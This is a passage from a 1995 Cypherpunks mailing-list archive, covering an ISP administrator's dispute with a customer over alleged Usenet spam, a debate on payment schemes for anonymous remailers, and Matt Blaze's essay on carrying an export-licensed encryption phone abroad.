for you, take it or leave it.

And stalking laws?  I don't think so.  There is a difference in
notification and stalking and my email to you is far from stalking.

> And please...deactivate my WWW pages. I was astounded to find out
> that during the suspension, they continued to remain active, as I
> learned in the office Wednesday. That was (and still is) stealing my 
> net.web.goodwill, and creating a falsehood amongst other users.

They were left there because they are of use to the 'net and until
I could hear from you what you wanted done with your files, there was
no need to remove the WWW pages or your account.

Now that we have your decision, everything will be removed.

And stealing?  You had them up for public consumption for many weeks.
Did everyone who touched your page steal then?

So, no, no advantage was taken by us via your WWW pages.

> I spent six full hours making a personal appearance, at great 
> personal expense, to the Winternet Office to resolve the situation.

Great personal expense?  This is going to be fun.

I don't think harassing Chad (my intern) or Doug (my roommate) for
6 full hours a very nice thing to do at all.  If you had wanted to 
meet me there, you could have had one of them call me, or if they
did not have the number for where I was at that day (which happened
to be my first complete day off in a few weeks), you could have
dropped me email stating you were at the office to discuss this.  I
was only 10 minutes away at a friends house to escape work.  I am
pretty sure they told you I was taking a day off after they found
out from me.  I was going to be in, I decided to rest instead.  So
sue me for it.

No Carol Anne, you did not have any 'great personal expense', what
you did do was impose yourself on two people for 6 hours.

You also then used our basic login on our console machines, which
is there for when people come to visit, to post messages to UseNet
and to send and receive email.  Not very nice now is it?  When service
was suspended, it meant all service, not just your account on the
main machines.

Talk about net.good.will...you stole service after it was suspended.

> My original reply still sits in suspended composition in my mailer. I 
> wasted not a nano-second in preparing my reply to the posting. In legal
> point of fact, the poster is violation of Minnesota State Law. He has
> no legal jurisdiction whatsoever.

What are you talking about now?

I hope you don't think I am taking legal action for something, because
that would be just funny to hear.  Your account was terminated for a
breach in our AUP, not because you caused me or Winternet harm.

> I did not take days to "investigate", nor cite that other things such as
> "my machines being hacked" and "I'll do it when I'm ready to do it,".

First day, monday, when I suspended your account, you did not even feel
it was resonable to call me when I had written a message to your screen
explaing that we needed to talk.

Tuesday, after being up for 20+ hours and getting a couple hours sleep,
you call and harass me at home even more about the status of your
account.  I told you I wanted to investigate these instances and that
I did not have the time because I was dealing with some hackers who
had tried to break in.  Again, sue me, this time for being tired.

Wednesday, I was going to be into work, which you assumed I would be, 
but did not bother to call to make sure I was around.  I decided I
was going to take that day off I had been trying to take and did
NOT find out you were in the office until late afternoon Wed.  I asked
Chad and Doug why you were there, and they said they did not know.  If
you had wanted to see me to talk about this, you should have spoken
up.

The machine being down was not used as an excuse, but it is hard to
operate like we used to with only one user machine.  This is a piece
of stress on me, which was never taken out on you or on any other
user.

> I was a simple complaint. It had no validity. Crossposting an article to
> .1% of the Usenet News Groups does not by the very statistic constitute 
> spam. (And I own two shares of Hormel Corp, so I do know what SPAM (tm) is.

What you consider spamming, and what others do, is two different things.
I explained my views, you have seen our AUP, and it was in my judgement,
and later, after talking with my peers, their judgement, that things
had gone too far.

Should I also bring to light your unsolicited mailings you did to users
on Winternet and others out to the 'net?  Remember those?  Something
about selling web pages from your account, which I had told you I would
rather you did not do, very politely I might add.  Or what about the
net cash mass mailing you did to people?

That is 2 counts in 2 days (notified on monday, early, of the spamming,
notified on wed of the mass unsolicited mailings).  Sorry, someone had
to put their foot down, and it happened to be us.

> The crossposting wasn't wasting resources.

It was innapropiate for the groups that you posted to.

> It is of no one's concern the actual groups posted. 

It is when others have to read it.

> They have the right and ability to respond.

And they did, both to you, you have stated, and to me, as the admin
of Winternet.

> I asked for no money. I did not stand to profit by the posting.

That doesn't matter, it was still innapropiate to post this message
to the groups you posted to.

> The person who started the whole thing was pretty heavily chastised,
> by the readers of his own news group.

Huh?

> A fast "K" was all that any individual needed for this article.

Uhuh, we could have done that for C&S also, but it would not have
helped.

> No, Mr. Horwath, you are "way out-of-bounds" this time.
> And as the time cronology unveils itself, I am sure that 
> will be shown to be a very truthful, factual statement.

Sorry Carol Anne, but this is a system I administer and I use the AUP
to protect all of us accross the 'net.  This was not an attack against
you.  You were not judged unfairly.  What you did was break our agreement
and for this, you lost your service.

Also, you hadn't paid for your account for over 10 weeks, so why are you
bitching so much anyway?  We had talked about the winternet t-shirts
and how we would use the work you did and the monies you would receive
as payment.  Well, no t-shirts have gone out and at this time, I will
be cancelling all orders for them and will redesign them and have them
produced externally to what you have done.  This is what happens when
you hold something over someones head.

> Dangerous precedents were set here. I will not rest until the 
> whole of the Internet knows and is aware of the situation.

Then spam again, Carol Anne.

> Signed
> Carol Anne Braddock
> Friday January 6th, 1995 9:40 A.M.


> On Fri, 6 Jan 1995, Mike Horwath wrote:
> 
> > You are welcome to your files and mail, I will pack everything up for
> > you as you left it, including your FTP area.
> > 
> > I expect you to try to reach me today in the afternoon at my office and
> > I will fully explain why your account was deleted, with full detail as
> > to why.
> > 
> > I do appreciate the work you did on the shirts for Winternet.  I don't
> > appreciate the harassment you have already tried to bring upon me.
> > 
> > When we talk, I think you might understand why this was done.  If you do
> > not, then I feel bad, as I must then not be making myself clear.  But
> > no matter what, this was policy that you chose to break even after I 
> > had talked to you about it.  More on this when we talk.
> > 
> > Good luck at your new provider, Larry Leone is an old user of mine and
> > seems to be a good guy, even if a little quiet on the newsgroups :)
> > 
> > A copy of this letter is also going to your new admin so that he knows
> > what is going on.
> > 
> > Larry, Carol Anne was using about 11.5MB of disk that will be moving
> > over from Winternet to MM.
> > 
> > Also, how have you been anyway?  Been awhile since I saw you.  Oh, and
> > could you install identd on your system?  Get back to me on anything,
> > or with questions.
> > 
> > -- 
> > Mike Horwath    IRC: Drechsau    LIFE: Lover     drechsau@winternet.com
> > Winternet:  info@winternet.com              root@jacobs.mn.org <- Linux!
> > Twin Cities area Internet Access:  612-941-9177 for more info
> > Founding member of Minnesota Coalition for Internet Accessibility

[all previously included messages left intact]

-- 
Mike Horwath    IRC: Drechsau    LIFE: Lover     drechsau@winternet.com
Winternet:  info@winternet.com              root@jacobs.mn.org <- Linux!
Twin Cities area Internet Access:  612-941-9177 for more info
Founding member of Minnesota Coalition for Internet Accessibility



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 6 Jan 95 16:20:05 PST
To: cypherpunks@toad.com
Subject: Re: All I did was properly crosspost!
In-Reply-To: <9501062310.AB20311@eri.erinet.com>
Message-ID: <199501070020.QAA03416@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> The discussion on alt.current-events.net-abuse seemed to indicate that the 
> claim of "Just 10" above is a slight understandment.  The newsgroups seem to 
> have been hit alphabetically, and I believe the total count was in the hundreds.
> 
>     --Paul J. Ste. Marie
>       pstemari@well.sf.ca.us, pstemari@erinet.com

The individual who posted the first hysterical message about Carol's
alleged spam in a.c-e.n-a leaped to the conclusion that it was being
posted to a large number of groups because one of the newsgroups posted
to had a very low ordinal in the alphabetical list of all newsgroups.

The message itself, which he quoted, was only cross-posted to the
10 newsgroups specified.  I believe the CancelMoose threshold for an
official spam is 50 newsgroups.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 6 Jan 95 13:21:06 PST
To: jrochkin@cs.oberlin.edu
Subject: Re: Remailer Abuse
In-Reply-To: <1185.789426406.1@nsb.fv.com>
Message-ID: <4j3PEYr0Eyt5IxI7VW@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 6-Jan-95 Re: Remailer Abuse jrochkin@cs.oberlin.edu (3378*)

> 1) The initial remailer has no way of knowing how many subsequent links
> there are in the chain, and so doesn't know if I've paid him enough to
> reimburse everyone else.  I can easily cheat. 

This depends entirely on your definition of "cheating".    Basically, my
proposal (which I think crossed in the mail with yours, so I'm not
claiming that you misunderstood it -- in fact you anticipated *most* of
it, I think) was to charge once for entry to the "system", and to
include in that charge as many "hops" as you feel are necessary.  No
cheating involved -- the truly anonymous hops would only be accessible
from within the "system", i.e. from a similar anonymous remailer
"inside" the system or from one of the fee-for-entry systems.  If this
is the charging model, then the objections about knowing the chain
length, etc. all go away.

> 2) This system requies a good deal of cooperation and organization among
> remailer operators. 

Not that much, just a revenue sharing arrangement based on income and
volume.  Consortia do this sort of thing all the time, though most
consortia aren't formed in quite the atmosphere of paranoia that often
surrounds remailers.....

> Assuming that there will be some free as well as some charging remailers,
> I'd also like to use some of each in my chain.  I see some problems with
> the Remailer Trade Association allowing those transactions to happen.
> (will they accept incoming mail from a non-affilated remailer, which surely
> won't be paying them at the end of the month?  Surely not, which means if I
> use any affilated remailers in my chain, no affilated remailers can come
> afterwords. So all affilated remailers I'm using have to come before all
> non-affiliated remailers, which is an undesirable restriction which could
> aid traffic analsysis. If there are several affiliations, things get even
> more complicated.)

Actually, I think this could be serialized -- you could design it so
that you could use free remailers either before or after the consortium
members, but once you left the consortium system your message would have
to somehow pay to get back in again.  That would be a mess, and not my
preferred way to do it.

> And it isn't an issue of
> certain sacrifices you have to make in order to set up for-pay remailers,
> as a Chaum digicash based for-pay remailer system would work admirably, and
> none of my objections would apply to it.

Yes, it is is true that if digicash starts working for real money, it
will answer your objections quite nicely.  However, there are lots of
objections to that sort of system, too, they're just different ones.  As
both the FV and Digicash folks have pointed out many times, we have very
different technologies that fill very different requirements, it's not
an either/or choice.  I think you could build interesting anonymous
remailers on each system, too.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonny Goldman <jonny@Synopsys.COM>
Date: Fri, 6 Jan 95 16:19:51 PST
To: tengi@Princeton.EDU
Subject: Indexing and searching (was Re: public vs. private replies)
In-Reply-To: <9501062315.AA29835@deepthought.Princeton.EDU>
Message-ID: <9501070020.AA01782@philo.synopsys.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 06 Jan 1995 18:15:40 EST
   From: "Christopher J. Tengi" <tengi@Princeton.EDU>

   You may want to take a look at glimpse and harvest.  Here are some useful URLs 
   for them:

   http://glimpse.cs.arizona.edu:1994/

   http://harvest.cs.colorado.edu/

Both very good systems.  Harvest is probably overkill.  Glimpse is nice,
but I don't know if it handles mail archives (unless they are
one-file-per-message).

   > 
   > In article <199501060807.DAA22166@bb.hks.net>,
   > L. McCarthy <lmccarth@ducie.cs.umass.edu> wrote:
   > >Tim May writes:
   > >> In my opinion, having personal access
   > >> to past posts is several orders of magnitude more important than
   > >> having MIDI-MIME JPEG-II TeX players [...]
   > >
   > >It takes more disk space from one's personal quota, though (for those who
   > >suffer under such restrictions). :[
   > 
   > All posts to cypherpunks since June '94 are available by ftp from
   > ftp.hks.net:/cypherpunks/nntp/cypherpunks.   They are also available
   > via nntp from nntp.hks.net:hks.lists.cypherpunks.
   > 
   > I'd be glad to put a search engine of some sort on them, either by
   > Web or by mailserver, if someone can suggest a reasonable way to index
   > the whole lot.

There used to be a WAIS index of cypherpunks on mariposa, but it doesn't
seem to work now.

WAIS indexing mail archives is pretty easy.

- Jonny G




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 13:30:13 PST
To: Nathaniel Borenstein <nelson@crynwr.com
Subject: for-pay remailers and FV (Was Re: Remailer Abuse)
Message-ID: <ab336511060210049dfa@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:10 PM 01/06/95, Nathaniel Borenstein wrote:
>I hate to say it, because I generally tend to take the pro-FV side of
>most arguments :-), but I think Jonathan's closer to the mark in this
>case.  If mail goes through ten remailers, and they ALL charge via First
>Virtual, then the last one in the chain won't have to know who you are,
>but it will have to know your FV billing account.  Thus it, together
>with FV, have enough information to break anonymity.
>
>This is NOT the same as saying that ANY one operator, together with FV,
>can burst anonymity; it means that the last one + FV can do so.  I

Hmm. Maybe I don't completely understand how this is going to work, but
won't _every_ remailer in the chain need to know your FV billing account?
How would the rest of them charge via FV without knowing your billing
account?  What Russell was suggesting (I think), was that only the first
would bill via FV directly, so only the first would need to know your
billing account, and then he'd settle up with the others at the end of the
month. (A particular variation of that scheme is what you mentioned later
in your message, and I'll get to that).

But assuming that every remailer along the chain _was_ charging via FV, I
fail to see how only the last one would need your billing account; seems to
me they all would, and thus any one could collude with FV to violate your
anonimity.

[...]
>Personally, for my taste this is sufficiently anonymous for any
>reasonable purpose.  HOWEVER, I can imagine how to make it even more
>anonymous.  Imagine that there are ten for-profit anonymous remailer
>operators who form an "anonymous remailers consortium".  Each of them
>operates TWO remailers, a for-pay one and a free one, but the free one
>will only take things that have come directly via some consortium
>member's anonymous remailer, so your message has to be paid for once, at
>the entry point to the overall system.    Now you can build up a chain
>that STARTS with a payment, but then threads its way through a bunch of
>less traceable systems. where the operators can't give tracing
>information even under court order.  The consortium members would
>probably have to agree to some revenue sharing arrangements, but you
>could make this work.

Yeah,  that's a specific instance of the type of thing Russel was proposing
in the message you were replying to. An instance which avoids many of the
critisisms I made directly after Russell's message, but not all. The
remailer operators still have to have an organization and remain in close
contact, which I am uncomfortable with because it seems to make collusion
more likely. And it's still dificult to intermix for-pay and free remailers
within your chain, or even just for-pay remailers from several different
consortiums. And there are a variety of problems in that inability.   [The
consortium, as far as I can tell, would also find it rather dificult to
charge more for a longer chain, I can't think of any way for them to charge
anything excpet a uniform amount regardless of length of chain, unless you
give the first remailer a way to tell the length of your chain, which is
undesirable. I'm not sure if this is a problem.]

>I think this level of engineering is overkill -- for my personal level
>of paranoia, I would settle for a single for-pay anonymous remailer
>located in a country with very different laws than those that governed
>the payment system.    Such a system would probably be "breakable" for

And this level of paranoia would be perfectly well surved by a Julf/penet
style remailer, which _would_ work well with an FV-payment system, as I
agreed before.  The cypherpunks chained remailernet system as a whole is
overkill for your paranoia needs, but appearantly not for the needs of
those who use it over Julf's.  It appears to me, that an FV-style payment
scheme can't be added to the cypherpunks chained remailer system without
dropping it's security to the level of Julf's.  Which might be good enough
for you, but not good enough for me, or presumably for anyone else that
uses cypherpunks remailers.

[Do you understand how cypherpunks remailers work, and the difference
between them and a julf/penet style remailer?   Do you understand how
encryption is used in a cypherpunks-style remailer chain to make it so each
individual remailer only knows the next remailer along the chain, and not
the entire rest of the chain?]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 13:44:48 PST
To: Nathaniel Borenstein <cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <ab33683b080210045c1e@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:20 PM 01/06/95, Nathaniel Borenstein wrote:
>Yes, it is is true that if digicash starts working for real money, it
>will answer your objections quite nicely.  However, there are lots of
>objections to that sort of system, too, they're just different ones.  As
>both the FV and Digicash folks have pointed out many times, we have very
>different technologies that fill very different requirements, it's not
>an either/or choice.  I think you could build interesting anonymous
>remailers on each system, too.  -- Nathaniel

Try to bring up objections to a digicash-style system that are applicable
to remailers.   I agree that they are different technologies that fill
different requirements, but it seems to me that the particular requirements
of a remailer system are only met by a digicash/magic money style
technology.

 I think  an electronic cash system that will work with remailers, must
satisfy these things:
1) You need to be able to enclose the "signifyer" of the transaction inside
encryption.  Whether the "signifyer" is the cash itself, or an agreement to
make a transaction together with a billing number, or whatever, you need to
be able to enclose it in a PGP (or other arbitrary PKE protocol) encrypted
block.
2) The "signifyer" of the transaction (which again might theoretically be
the cash itself, or some kind of billing number) alone shouldn't be enough
to reveal the identity of the anonymous user.

Number two up there is what most of us _mean_ by "anonymous digital cash",
and FV simply doesn't meet it. FV might be perfectly adequate in some
circumstances, but it doesn't meet that requirement, and many of us aren't
going to feel comfortable using a system to pay for remailer access (among
other things, certainly, but remailer access is something that is worthless
without anonymity) that doesn't fulfill that requirement.  If the
"signifyer" alone can be used to determine who I am, even if it takes the
collusion of FV and a remailer op, I'm not comfortable with that.  Number
One is neccesary for the ecash protocol to work within the remailer
framework effectively; I've got to send each remailer it's payment within
an "envelope" that no one else can penetrate.

The use of an ecash payment system which doesn't meet these two
requirements can't help but _lessen_ the security of the current
conglomeration of remailers. Which is unacceptable to me.  Remailers should
be trying to approach the goal of ensured secure anonymity, and requiring
payment by an ecash system which doesn't meet those two requirements would
seem to be retreating from that goal, in a rather dificult to reverse
manner.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Fri, 6 Jan 95 13:56:39 PST
To: cypherpunks@toad.com
Subject: My life as an international arms courier
Message-ID: <9501062154.AA04543@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Under an obscure provision of US law, devices and computer programs
that use encryption techniques to hide information from prying eyes
and ears are considered ``munitions'' and subject to the same rules
that govern the international arms trade.  In particular, taking such
items out of this country requires the approval of the State
Department, which decides whether exporting something might endanger
national security.  In the past, these restrictions were of little
concern to the average citizen; encryption found most of its
application in military and diplomatic communications equipment.
Today, however, growing concern over electronic fraud and privacy
means that encryption techniques are starting to find their way into
more conventional commercial products like laptop computers and
portable phones.

Mostly to find out what the process was like, I recently applied for a
temporary export license for a portable telephone encryption product
that I wanted to take with me on a business trip to England and
Belgium.

The item in question is more properly called a ``telephone security
device.''  This is a little box that scrambles telephone conversations
to protect them against eavesdroppers; this sort of protection is
sometimes important when discussing confidential business matters from
faraway places.  The particular model I bought was already approved
for export; it employs a cipher algorithm that the government has
already decided is not a threat to national security even should it
fall into the hands of some rogue government.  This model is aimed
primarily, I presume, at international business travelers who want to
communicate in a reasonably secure manner with their home offices in
the states.  In other words, a typical user buys two of them, leaving
one at the home office and carrying the other when traveling abroad.
The options that came with my device included a James Bond-ish looking
acoustic coupler and handset to facilitate its connection to the
hardwired phones that are still common in European hotel rooms.

It turns out that there was recently some discussion in the government
about exempting products like my secure phone from the licensing
paperwork requirements.  Unfortunately, however, this exemption never
actually took effect.  So even though the device I had was already
approved for sale abroad, I still needed to get a temporary export
license before I could take it with me.  But I was assured that ``this
is an easy, routine process''.  Well, sure enough, about two weeks
before I was to leave I got back my official US State Department
``license for the temporary export of unclassified defense articles''.
So far, so good.

From what I was able to figure out by reading the license (and having
a few conversations with an export lawyer), I'm required to leave from
an international airport with a Customs agent present (no problem
there, although Customs is geared to arriving, rather than departing,
travelers).  At the airport, I'm supposed to fill out a form called a
``shipper's export declaration'' (SED) on which I have to declare that
``these commodities are authorized by the US government for export
only to Belgium and the United Kingdom.  They may not be resold,
transshipped, or otherwise disposed of in any country, either in their
original form or incorporated into other end-items without the prior
written approval of the US Department of State''.  Then I'm to present
the SED and export license to a Customs official at the airport before
I leave.  The Customs officer is supposed to take my SED and endorse
my license to show what I'm actually taking out of the country.

On the way back in, I'm supposed to ``declare'' my item at Customs
(even though it was manufactured in the US) and show them my license,
and they're supposed to endorse the license again as proof that I
have, in fact, returned the ``defense article'' to the safety of the
United States.

The first hitch I ran into was that no one could actually tell me
where I could get an SED form.  But when I called Customs they assured
me that this was no big deal.  ``Just come by when you get to the
airport and we stamp the license.  I guess you can just fill out the
SED there,'' they said.

I made sure to get to the airport early anyway.

Although there was moderately heavy traffic near the airport, I made
it to JFK two and a half hours before my 10pm flight.  I was flying
United, which has their own terminal at JFK, so Customs has an office
right there in the same building from which I was to depart (JFK is
awful to get around, so I was glad for this).  I checked in for my
flight (and got upgraded to first class, which bolstered my
expectation that everything was going to be really easy from here on).
Then, luggage, license and phone in hand, I made my way downstairs to
Customs, expecting to fill out the SED form and ``just have my license
stamped'' as they had assured me earlier on the telephone.  I
explained my situation to the security guard who controls entry to the
Customs area, and he led me to ``the back office'' without much
argument or delay.  The head uniformed Customs guy in the back office
(which I think is same office where they take the people suspected of
being ``drug mules'' with cocaine-filled condoms in their stomaches)
looked approachable enough.  He had a sort of kindly, grandfatherly
manner, and he was playing a video game on a laptop computer.  I got
the impression that most of the people he encounters are suspected
drug smugglers, and he seemed pleased enough to be dealing with
something a little different from the norm.  When I explained what I
was doing he looked at me as if I had just announced that I was a
citizen of Mars who hadn't even bothered to obtain a visa.

He explained, carefully, that a) I really do need the SED form; b) not
only that, I should have already filled it out, in duplicate; c) he
doesn't have blank SED forms; d) he, like everyone else in the entire
US government that I had spoken to, has no idea where one gets them
from, but people must get them from somewhere; and e) it doesn't
really matter, because I'm in the wrong place anyway.

I asked him where the right place is.  ``The cargo building, of
course,'' he told me, patiently.  I remembered the cargo building
because I passed it in the taxi just as the traffic jam began, about
half an hour before I got to the United terminal.  The airport shuttle
bus doesn't stop there.  I'd have to call a taxi.  ``But I think
they're closed now, and even if they were open you'd never make it
before your flight'' he helpfully added, saving me the trip.  He also
complemented me for going to the trouble to get the license.

I must have looked hurt and confused.  Eventually he called in some
fellow in a suit who I presume to have been his boss.

``Are you the guy who wants to export the fancy gun?'' the fellow in
the suit asked me.

``It's not a gun, it's a telephone,'' I responded, with a straight
face.

``Why do you have a license to export a telephone?''  Good question, I
thought.  I explained about the export law and showed him the thing.
He agreed that it looked pretty harmless.

The fellow in the suit reiterated points a through e almost verbatim
(do they rehearse for these things?) and explained that this isn't
really their department, since my license was issued by the State
Department, not Customs, and my situation doesn't come up very often
because exports usually go via the cargo building.  He'd love to help
me, but the computer in which these things get entered is over in
Cargo.  ``That's how the records get made.  But you do have a valid
license, which is nice.''  He also suggested that I would have had an
easier time had I shipped the device instead of carrying it with me.

I asked what I should do, given that my plane was scheduled to leave
in less than an hour.  Neither was sure, but the fellow in the suit
seemed willing leave it to the discretion of the uniformed guy.  ``How
does this thing work, anyway?'' he asked.  I explained as best as I
could, trying to make it sound as harmless as it is.  ``You mean like
that Clipper chip?'' he asked.

At this point, given that he has a computer and knows something about
the Clipper chip, I figured that maybe there was some hope of making
my flight.  Or maybe I was about to spend the night in jail.  In my
mind, I put it at about a 90:10 hope:jail ratio.

Then he asked, ``Do you know about this stuff?''

So we chatted about computers and cryptography for a while.  Finally,
the two of them decided that it wouldn't really hurt for them to just
sign the form as long as I promised to call my lawyer and get the SED
situation straightened out ASAP.  They assured me that I won't be
arrested or have any other trouble upon my return.

I made my flight, validated license in hand.

An aside: Throughout my trip, I discovered an interesting thing about
the phone and the various options I was carrying with it.  Under X-ray
examination, it looks just like some kind of bomb.  (I suspect it was
the coiled handset cords).  Every time I went through a security
checkpoint, I had to dig the thing out of my luggage and show it to
the guard.  I almost missed the new ``Eurostar'' chunnel train (3hrs
15mins nonstop from London to Brussels, airport-style checkin and
security) as the guards were trying to figure out whether my telephone
was likely to explode.

Coming back to the US was less eventful, though it did take me an
extra hour or so to get through Customs.  Expecting a bit of a hassle
I didn't check any luggage and made sure to be the first person from
my flight to reach the Customs line.  The inspector was ready to
wordlessly accept my declaration form and send me on my way when I
opened my mouth and explained that I needed to get an export license
stamped.  That was obviously a new one for him.  He finally decided
that this had to be handled by something called the ``Ships Office''.
I was sent to an unoccupied back room (a different back room from
before) and told to wait.  I thought about the recent Customs
experiences of Phil Zimmermann.  (Zimmermann, the author of a popular
computer encryption program, was recently detained, questioned and
searched by Customs officials investigating whether he violated the
same regulations I was trying so hard to follow.)  After about half an
hour, an officer came in and asked me what I needed.  I explained
about my export license that had to be endorsed.  She just shrugged
and told me that she had to ``process the flight'' first.  As best as
I could tell, her job was to clear the airplane itself through
Customs, that being, technically speaking, a very expensive import.
It would take a little while.  She was pleasant enough, though, and at
least didn't look at me as if she intended to send me to jail or have
me strip searched.

Finally, she finished with the plane and asked me for my form.  She
studied it carefully, obviously never having seen one before, and
eventually asked me what, exactly, she was supposed to do.  I
explained that I had never actually gone through this process before
but I understood that she's supposed to record the fact that I was
re-importing the device and stamp my license somewhere.  She told me
that she didn't know of any place for her to record this.  After some
discussion, we agreed that the best thing to do was to make a Xerox
copy of my license and arrange for it to go wherever it had to go
later.  She stamped the back of the license and sent me on my way.  It
was a little over an hour after I first reached the Customs desk.

My conclusion from all this is that it just isn't possible for an
individual traveler to follow all the rules.  Even having gone through
the process now, I still have no idea how to obtain, let alone file,
the proper forms, even for a device that's already been determined to
be exportable.  The export of export-controlled items is ordinarily
handled by cargo shipment, not by hand carrying by travelers, and the
system is simply not geared to deal with exceptions.  Technically
speaking, everyone with a laptop disk encryption program who travels
abroad is in violation of the law, but since no one actually knows or
checks, no mechanism exists to deal with those who want to follow the
rules.  While (fortunately) everyone I dealt with was sympathetic, no
one in the government who I spoke with was able to actually help me
follow the rules.  I was permitted to leave and come back only because
everyone involved eventually recognized that my telephone was pretty
harmless, that my intentions were good, and that the best thing to do
was be flexible.  If anyone had taken a hard line and tried to enforce
the letter of the law, I simply wouldn't have been able to take the
thing with me, even with my license.  Had I just put my telephone in
my suitcase without telling anyone instead of calling attention to
myself by trying to follow the rules, chances are no one would have
noticed or cared.

Unfortunately, however, these absurd rules carry the full force of
law, and one ignores them only at the risk of being prosecuted for
international arms trafficking.  While it may seem far-fetched to
imagine US citizens prosecuted as arms smugglers simply for carrying
ordinary business products in their luggage, the law as written allows
the government to do just that.  At the same time, anyone who is aware
of and who tries to follow the regulations is made to jump through
pointless hoops that are so obscure that even the people charged with
enforcing them don't know quite what to make of them.

Copyright 1995 by Matt Blaze. All rights reserved.

Electronic redistribution permitted provided this article is reproduced
in its entirity.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@python.ee.unr.edu>
Date: Fri, 6 Jan 95 14:12:05 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <199501062217.RAA29043@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> >Why?  Why wouldn't the FV remailers use settlements?  At the end of
> >the month, everyone settles accounts in re who gets what fraction of
> >what.  No logs are needed other than counters.

> Oh, you're suggesting that I'd only actually pay the first remailer on my
> chain, and at the end of the month he'd pay some of the money I (and
> others) paid him to all of the other remailers his transacted with over the
> month? 

Way too complicated . . .

Why not establish a system where the only the first remailer is paid and
all subsequent remailers agree to accept traffic from other remailers
without compensation? Assuming that first remailer use is or would be
somewhat distributed, the net from each remailer would approach the same
figure reached by endlessly confusing cross-payments (A pays B, C, and D,
B pays A, C, and D, etc.). Only non-remailed access would be subject to
a fee.

Operators with the best net. reputations and those whose remailers are 
especially full featured or prompt will likely receive more use as
"entry" remailers; this is good capitalism which should not only increase
their number but improve the state of remailers in general. If someone
wants to establish a remailer that will join the existing mesh of remailers,
it will have to accept messages from others gratis if it wants such access
to the rest of them. Its compensation would be derived from initial traffic.

Maybe this would also encourage operators to beat the bushes for traffic,
which would also be a Good Thing.


=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw3BayoZzwIn1bdtAQECegGAjSdkX8YYygLJkk1K/Sr6A84QpdNOXbUq
uuWxqbSg+6T3Tac+GKdxdNw2SqdExIrV
=z/ms
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Fri, 6 Jan 95 18:07:47 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: Remailer Abuse
In-Reply-To: <ab33592305021004d062@[132.162.201.201]>
Message-ID: <950106.173231.9X3.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, jrochkin@cs.oberlin.edu writes:

> At 3:12 PM 01/06/95, Russell Nelson wrote:

>>Why?  Why wouldn't the FV remailers use settlements?  At the end of
>>the month, everyone settles accounts in re who gets what fraction of
>>what.  No logs are needed other than counters.
> 
> Oh, you're suggesting that I'd only actually pay the first remailer on my
> chain, and at the end of the month he'd pay some of the money I (and
> others) paid him to all of the other remailers his transacted with over the
> month?  I hadn't thought of that, but now that I do, I can see several
> problems arising.

This might not be as much of a problem as you think.  Given that there
will likely be a mixture of free and pay remailers, and that a given
message may chain through one or more of either type, why not place the
stamp for each pay remailer inside the encrypted sub-packet which that
mailer will receive?

Think of each remailer as an independant post office.  For each pay
remailer, you need one stamp.  Ideally, each stamp would be a bit less
expensive, but since remailers don't need to share their revenue, that
shouldn't be much problem.  An intelligent chainer (Chain++, maybe?)
could keep track of your postage and put the stamps in the proper inner
envelopes.

This would work best if all the pay remailers accepted a common brand of
stamp.
- -- 
       Roy M. Silvernail         [ ]  roy@cybrspc.mn.org
                    PGP public key available by mail
     echo /get /pub/pubkey.asc | mail file-request@cybrspc.mn.org
         These are, of course, my opinions (and my machines)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLw3VrBvikii9febJAQFozwQAkYUBp9Uc5Lbmc4udL7hwTgBY9I+yfKdy
wvW5xl4TeTeJLAS95yHOyiEKP/nVsjfknr4gx1mOrFZYOxkNRJa78YeQ8tDAVq7Y
S1UQrYqHJAoi/AKdypufIaeu8iF/1pVbYLDdIbbQm3bxlUZHwciYJUvnneRjFbhA
BJB+ruqzEMs=
=CGFS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 6 Jan 95 14:45:49 PST
To: jrochkin@cs.oberlin.edu
Subject: Re: for-pay remailers and FV (Was Re: Remailer Abuse)
In-Reply-To: <2292.789427808.1@nsb.fv.com>
Message-ID: <wj3QKlz0Eyt5AxIAJg@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from fv: 6-Jan-95 for-pay remailers and FV (W..
jrochkin@cs.oberlin.edu (4416*)

> Hmm. Maybe I don't completely understand how this is going to work, but
